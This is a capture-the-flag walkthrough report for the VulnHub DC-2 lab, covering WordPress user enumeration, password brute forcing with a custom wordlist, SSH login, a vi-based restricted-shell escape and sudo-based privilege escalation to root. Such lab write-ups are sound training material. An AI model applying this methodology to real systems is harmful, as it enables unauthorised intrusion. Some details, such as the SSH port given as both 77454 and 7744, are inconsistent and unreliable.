DC-2 VULNHUB

PROJECT REPORT

HAREESH K P
[email protected]
 CONTENTS

• Introduction
• Active information gathering
• Vulnerability scanning
• Exploitation
• Enumeration and privilege escalation
• Important take away from this lab
INTRODUCTION
To find the 5 flags. These flags are hints for further steps.
The location of these flags is just an indicator where a
good penetration tester should look. An alternative
approach could also be to directly get to root
Penetration methodology
• Discovering Targets IP
• Network scanning (Nmap)
• Adding the Domain name to Host file
• Surfing HTTP service port
• Using WPscan for Username enumeration
• Using cewl for creating wordlist
• Logging into WordPress
• Logging in through SSH
• Escaping restricted shell
• Finding binary in the sudoers list
• Getting root access and reading final flag
 Active information gathering
• Host discovery and port scanning

There was only two services running on the victim system,

HTTP and SSH. HTTP services are running, means it must have a
webpage. Browsing the website gives us our first flag.
The Flag option on the webpage clearly got our attention.
Let’scheck what hint it has for us. So from this page, we got a
really good hint to move ahead.

Vulnerability scan
I directly moved on to this step as this is my personal lab
environment. I used nmap to find vulnerabilities in Wordpress
webapp.
So, the first idea that came to us was to run a wpscan on
the webpage and see what the scan enumerates.
The above results gave us some information:
1. File enumeration: /wp-login.php , …. , /readme.html
2. Users Enumeration: admin, tom, jerry

We got the below results from brute forcing

1. we have only validated that there is a user admin.
2. We have validated a user jerry and password of jerry is
adipiscing.
3. We have validated a user tom and password of tom is
parturient
We login using the credentials of jerry and tom and try to find
our flags. Traversing the admin panel, we find flag2

Since the clue was telling us to find another entry point to

reach our final flag. Suddenly we thought to make an SSH Login
running on port 77454 by using Tom’s credentials.

ssh [email protected] -p 7744

ls
cat flag3.txt
echo $PATH
ls /home/tom/usr/bin
Enumeration and Privilege Escalation
As you can observe that cat program is not present inside /bin
and tom can run only five programs present inside /bin
directory.
Since we had a restricted shell, we found that we can use the Vi
editor.
Therefore, we use Vi editor to escape the restricted shell.
After escaping the restricted shell, we export “/bin/bash” as
our SHELL environment variable and “/usr/bin” as our PATH
environment variable so that we can run Linux commands
properly.
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL
After that, we try to open flag3.txt again using cat command
and luckily found next hint to move ahead.
Ls
cat flag3.txt

According to hint, now we need to switch user from tom to jerry

but we don’t have jerry’s login credential. Then checked the
sudoers list and found that tom can run “/usr/bin/git” as root
without a password.

sudo -l
Having the root permission on git was like the cherry on the cake, because
through this I can try to escalate low privilege shell to high privilege shell.

We got the root access, then we switch to the root directory

and found our final flag
cd /root
ls
cat final-flag.txt
Conclusion
This was a good step up from the previous box since we needed
to create our own wordlist for bruteforce using cewl. A perfect
VM for beginners. We could use ports other than 22 for SSH.
These are used by administrator to harden their security. We
need a tool for URL enumeration like DIRB so that we find other
webpages accessible.. We touched “sudo -l” and privilege
escalation concepts to get root access